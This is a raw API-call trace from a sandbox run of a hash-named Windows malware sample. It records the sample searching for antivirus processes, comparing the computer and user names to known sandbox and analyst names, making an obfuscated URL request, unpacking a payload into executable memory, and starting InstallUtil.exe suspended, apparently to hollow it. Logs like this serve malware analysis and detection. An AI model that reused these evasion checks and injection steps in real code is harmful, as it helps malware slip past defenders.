[0174.220] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0174.221] lstrcmpiW (lpString1="backgroundTaskHost.exe", lpString2="PSUAService.exe") returned -1 [0174.221] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.222] lstrcmpiW (lpString1="svchost.exe", lpString2="PSUAService.exe") returned 1 [0174.222] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0174.223] lstrcmpiW (lpString1="backgroundTaskHost.exe", lpString2="PSUAService.exe") returned -1 [0174.223] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0174.224] lstrcmpiW (lpString1="backgroundTaskHost.exe", lpString2="PSUAService.exe") returned -1 [0174.224] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x364, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0174.225] lstrcmpiW (lpString1="msfeedssync.exe", lpString2="PSUAService.exe") returned -1 [0174.225] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0174.225] lstrcmpiW (lpString1="audiodg.exe", lpString2="PSUAService.exe") returned -1 [0174.226] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe")) returned 1 [0174.226] lstrcmpiW (lpString1="d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe", lpString2="PSUAService.exe") returned -1 [0174.226] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe")) returned 0 [0174.227] NtClose (Handle=0xbc) returned 0x0 [0174.227] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbc [0174.235] Process32FirstW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.236] lstrcmpiW (lpString1="[System Process]", lpString2="WRSA.exe") returned -1 [0174.236] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0174.237] lstrcmpiW (lpString1="System", lpString2="WRSA.exe") returned -1 [0174.237] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0174.238] lstrcmpiW (lpString1="smss.exe", lpString2="WRSA.exe") returned -1 [0174.238] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0174.239] lstrcmpiW (lpString1="csrss.exe", lpString2="WRSA.exe") returned -1 [0174.239] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0174.240] lstrcmpiW (lpString1="wininit.exe", lpString2="WRSA.exe") returned -1 [0174.240] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0174.241] lstrcmpiW (lpString1="csrss.exe", lpString2="WRSA.exe") returned -1 [0174.241] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0174.242] lstrcmpiW (lpString1="winlogon.exe", lpString2="WRSA.exe") returned -1 [0174.242] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0174.243] lstrcmpiW (lpString1="services.exe", lpString2="WRSA.exe") returned -1 [0174.243] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0174.244] lstrcmpiW (lpString1="lsass.exe", lpString2="WRSA.exe") returned -1 [0174.244] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.245] lstrcmpiW (lpString1="svchost.exe", lpString2="WRSA.exe") returned -1 [0174.245] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.246] lstrcmpiW (lpString1="svchost.exe", lpString2="WRSA.exe") returned -1 [0174.246] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0174.249] lstrcmpiW (lpString1="dwm.exe", lpString2="WRSA.exe") returned -1 [0174.250] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.250] lstrcmpiW (lpString1="svchost.exe", lpString2="WRSA.exe") returned -1 [0174.250] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.251] lstrcmpiW (lpString1="svchost.exe", lpString2="WRSA.exe") returned -1 [0174.251] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.252] lstrcmpiW (lpString1="svchost.exe", lpString2="WRSA.exe") returned -1 [0174.252] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.253] lstrcmpiW (lpString1="svchost.exe", lpString2="WRSA.exe") returned -1 [0174.253] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.254] lstrcmpiW (lpString1="svchost.exe", lpString2="WRSA.exe") returned -1 [0174.254] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x190, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.254] lstrcmpiW (lpString1="svchost.exe", lpString2="WRSA.exe") returned -1 [0174.254] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.255] lstrcmpiW (lpString1="svchost.exe", lpString2="WRSA.exe") returned -1 [0174.255] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0174.256] lstrcmpiW (lpString1="spoolsv.exe", lpString2="WRSA.exe") returned -1 [0174.256] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x364, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0174.257] lstrcmpiW (lpString1="sihost.exe", lpString2="WRSA.exe") returned -1 [0174.257] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.257] lstrcmpiW (lpString1="svchost.exe", lpString2="WRSA.exe") returned -1 [0174.257] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0174.258] lstrcmpiW (lpString1="SkypeHost.exe", lpString2="WRSA.exe") returned -1 [0174.258] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0174.259] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="WRSA.exe") returned -1 [0174.259] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x37, th32ParentProcessID=0x764, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0174.260] lstrcmpiW (lpString1="explorer.exe", lpString2="WRSA.exe") returned -1 [0174.260] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0174.261] lstrcmpiW (lpString1="RuntimeBroker.exe", lpString2="WRSA.exe") returned -1 [0174.261] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x364, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0174.262] lstrcmpiW (lpString1="taskhostw.exe", lpString2="WRSA.exe") returned -1 [0174.262] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0174.263] lstrcmpiW (lpString1="ShellExperienceHost.exe", lpString2="WRSA.exe") returned -1 [0174.263] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0174.264] lstrcmpiW (lpString1="SearchUI.exe", lpString2="WRSA.exe") returned -1 [0174.264] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.265] lstrcmpiW (lpString1="svchost.exe", lpString2="WRSA.exe") returned -1 [0174.265] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0174.266] lstrcmpiW (lpString1="WmiPrvSE.exe", lpString2="WRSA.exe") returned -1 [0174.266] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x274, pcPriClassBase=10, dwFlags=0x0, szExeFile="SystemSettingsBroker.exe")) returned 1 [0174.267] lstrcmpiW (lpString1="SystemSettingsBroker.exe", lpString2="WRSA.exe") returned -1 [0174.269] lstrcmpiW (lpString1="WMIADAP.exe", lpString2="WRSA.exe") returned -1 [0174.269] lstrcmpiW (lpString1="WmiPrvSE.exe", lpString2="WRSA.exe") returned -1 [0174.326] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbc [0174.333] Process32FirstW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.334] lstrcmpiW (lpString1="[System Process]", lpString2="fmon.exe") returned -1 [0174.424] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbc [0174.431] Process32FirstW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.432] lstrcmpiW (lpString1="[System Process]", lpString2="AvastSvc.exe") returned -1 [0174.526] GetComputerNameW (in: lpBuffer=0x18afd0, nSize=0x18afcc | out: lpBuffer="XC64ZB", nSize=0x18afcc) returned 1 [0174.840] lstrcmpW (lpString1="XC64ZB", lpString2="ELICZ") returned 1 [0174.866] lstrcmpW (lpString1="XC64ZB", lpString2="hfvdhx") returned 1 [0174.874] lstrcmpW (lpString1="XC64ZB", lpString2="NfZtFbPfH") returned 1 [0174.874] lstrcmpW (lpString1="XC64ZB", lpString2="tz") returned 1 [0174.880] lstrcmpW (lpString1="XC64ZB", lpString2="SANDBOX") returned 1 [0174.880] lstrcmpW (lpString1="XC64ZB", lpString2="JOHN-PC") returned 1 [0174.880] lstrcmpW (lpString1="XC64ZB", lpString2="HANSPETER-PC") returned 1 [0174.880] lstrcmpW (lpString1="XC64ZB", lpString2="MUELLER-PC") returned 1 [0174.881] lstrcmpW (lpString1="XC64ZB", lpString2="WIN7-TRAPS") returned 1 [0174.886] lstrcmpiW (lpString1="XC64ZB", lpString2="FORTINET") returned 1 [0174.892] lstrcmpiW (lpString1="XC64ZB", lpString2="TEQUILABOOMBOOM") returned 1 [0174.892] lstrcmpW (lpString1="XC64ZB", lpString2="TU-4NH09SMCG1HC") returned 1 [0174.892] lstrcmpW (lpString1="XC64ZB", lpString2="InsideTm") returned 1 [0174.892] lstrcmpW (lpString1="XC64ZB", lpString2="klone_x64-pc") returned 1 [0174.892] lstrcmpW (lpString1="XC64ZB", lpString2="7SILVIA") returned 1 [0175.045] GetModuleHandleW (lpModuleName="advapi32.dll") returned 0x74810000 [0175.095] GetUserNameW (in: lpBuffer=0x18afd0, pcbBuffer=0x18afcc | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18afcc) returned 1 [0175.184] lstrcmpiW (lpString1="RDhJ0CNFevzX", lpString2="CurrentUser") returned 1 [0175.184] lstrcmpiW (lpString1="RDhJ0CNFevzX", lpString2="sandbox") returned -1 [0175.190] lstrcmpiW (lpString1="RDhJ0CNFevzX", lpString2="Emily") returned 1 [0175.190] lstrcmpW (lpString1="RDhJ0CNFevzX", lpString2="HAPUBWS") returned 1 [0175.190] lstrcmpW (lpString1="RDhJ0CNFevzX", lpString2="Hong Lee") returned 1 [0175.190] lstrcmpW (lpString1="RDhJ0CNFevzX", lpString2="IT-ADMIN") returned 1 [0175.190] lstrcmpW (lpString1="RDhJ0CNFevzX", lpString2="Johnson") returned 1 [0175.190] lstrcmpW (lpString1="RDhJ0CNFevzX", lpString2="Miller") returned 1 [0175.197] lstrcmpiW (lpString1="RDhJ0CNFevzX", lpString2="TEQUILABOOMBOOM") returned -1 [0175.197] lstrcmpiW (lpString1="RDhJ0CNFevzX", lpString2="milozs") returned 1 [0175.197] lstrcmpW (lpString1="RDhJ0CNFevzX", lpString2="Peter Wilson") returned 1 [0175.197] lstrcmpiW (lpString1="RDhJ0CNFevzX", lpString2="sand box") returned -1 [0175.204] lstrcmpiW (lpString1="RDhJ0CNFevzX", lpString2="malware") returned 1 [0175.204] lstrcmpiW (lpString1="RDhJ0CNFevzX", lpString2="maltest") returned 1 [0175.204] lstrcmpiW (lpString1="RDhJ0CNFevzX", lpString2="test user") returned -1 [0175.204] lstrcmpiW (lpString1="RDhJ0CNFevzX", lpString2="virus") returned -1 [0175.204] lstrcmpiW (lpString1="RDhJ0CNFevzX", lpString2="Andy") returned 1 [0175.204] lstrcmpiW (lpString1="RDhJ0CNFevzX", lpString2="snort") returned -1 [0175.216] lstrcmpiW (lpString1="RDhJ0CNFevzX", lpString2="virusclone") returned -1 [0175.217] lstrcmpiW (lpString1="RDhJ0CNFevzX", lpString2="wilbert") returned -1 [0175.217] lstrcmpiW (lpString1="RDhJ0CNFevzX", lpString2="John Doe") returned 1 [0175.217] lstrcmpiW (lpString1="RDhJ0CNFevzX", lpString2="timmy") returned -1 [0175.248] GetModuleHandleW (lpModuleName="user32.dll") returned 0x75640000 [0175.287] MessageBoxTimeoutW () returned 0x1 [0183.864] GetModuleHandleW (lpModuleName="wininet.dll") returned 0x0 [0184.006] LoadLibraryW (lpLibFileName="wininet.dll") returned 0x70770000 [0191.264] InternetOpenW (lpszAgent=0x0, dwAccessType=0x1, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0201.874] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="7tr0l4pn2f71dC3WylH5KLCnxK6uIS.YHNoG6P59MrUWNPfi4zy", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x84000000, dwContext=0x0) returned 0x0 [0201.917] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0201.922] InternetCloseHandle (hInternet=0x0) returned 0 [0202.209] GetModuleHandleW (lpModuleName="shell32.dll") returned 0x75db0000 [0202.484] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe\" " [0202.484] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe\" ", pNumArgs=0x19f3a0 | out: pNumArgs=0x19f3a0) returned 0x7142a8*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe" [0202.707] GetCurrentProcess () returned 0xffffffff [0202.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19d6e0*=0x0, ZeroBits=0x0, RegionSize=0x19d6e4*=0x15f4b, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x19d6e0*=0x6a0000, RegionSize=0x19d6e4*=0x16000) returned 0x0 [0202.758] GetCurrentProcess () returned 0xffffffff [0202.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ed5c*=0x0, ZeroBits=0x0, RegionSize=0x19ed60*=0x13366, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x19ed5c*=0x11c0000, RegionSize=0x19ed60*=0x14000) returned 0x0 [0202.795] GetCurrentProcess () returned 0xffffffff [0202.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19ed64*=0x6a0000, RegionSize=0x19ed50, FreeType=0x8000) returned 0x0 [0202.825] GetCurrentProcess () returned 0xffffffff [0202.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ed40*=0x0, ZeroBits=0x0, RegionSize=0x19ed3c*=0x1202fa, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x19ed40*=0xe810000, RegionSize=0x19ed3c*=0x121000) returned 0x0 [0202.841] GetCurrentProcess () returned 0xffffffff [0202.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19ed5c*=0x11c0000, RegionSize=0x19ed30, FreeType=0x8000) returned 0x0 [0202.849] GetCurrentProcess () returned 0xffffffff [0202.849] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ed40*=0xe810000, NumberOfBytesToProtect=0x19ed3c, NewAccessProtection=0x40, OldAccessProtection=0x19ed24 | out: BaseAddress=0x19ed40*=0xe810000, NumberOfBytesToProtect=0x19ed3c, OldAccessProtection=0x19ed24*=0x4) returned 0x0 [0203.615] GetCurrentProcess () returned 0xffffffff [0203.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ed0c*=0x0, ZeroBits=0x0, RegionSize=0x19ed10*=0xed7b, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x19ed0c*=0x560000, RegionSize=0x19ed10*=0xf000) returned 0x0 [0203.628] GetCurrentProcess () returned 0xffffffff [0203.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19ed40*=0xe810000, RegionSize=0x19ed00, FreeType=0x8000) returned 0x0 [0203.770] GetCurrentProcess () returned 0xffffffff [0203.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19d6f8*=0x0, ZeroBits=0x0, RegionSize=0x19d6fc*=0x2c871, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x19d6f8*=0x6a0000, RegionSize=0x19d6fc*=0x2d000) returned 0x0 [0203.797] RtlDecompressBuffer (in: CompressionFormat=0x102, UncompressedBuffer=0x6a0000, UncompressedBufferSize=0x2d000, CompressedBuffer=0x560000, CompressedBufferSize=0xed7b, FinalUncompressedSize=0x19ecf4 | out: UncompressedBuffer=0x6a0000, FinalUncompressedSize=0x19ecf4) returned 0x0 [0203.937] GetSystemTime (in: lpSystemTime=0x19d738 | out: lpSystemTime=0x19d738*(wYear=0x7e6, wMonth=0x5, wDayOfWeek=0x4, wDay=0x5, wHour=0x2, wMinute=0x1f, wSecond=0x33, wMilliseconds=0x2f1)) [0204.033] Sleep (dwMilliseconds=0x3e8) [0204.039] GetSystemTime (in: lpSystemTime=0x19d728 | out: lpSystemTime=0x19d728*(wYear=0x7e6, wMonth=0x5, wDayOfWeek=0x4, wDay=0x5, wHour=0x2, wMinute=0x1f, wSecond=0x33, wMilliseconds=0x356)) [0204.123] GetCurrentProcess () returned 0xffffffff [0204.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19ecf0*=0x6a0000, RegionSize=0x19ece4, FreeType=0x8000) returned 0x0 [0204.227] GetEnvironmentVariableW (in: lpName="WINDIR", lpBuffer=0x19dc9c, nSize=0x1040 | out: lpBuffer="") returned 0xa [0204.374] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe" | out: lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe") returned="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe" [0204.374] Sleep (dwMilliseconds=0x3e8) [0204.589] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0xc, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19d508*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, 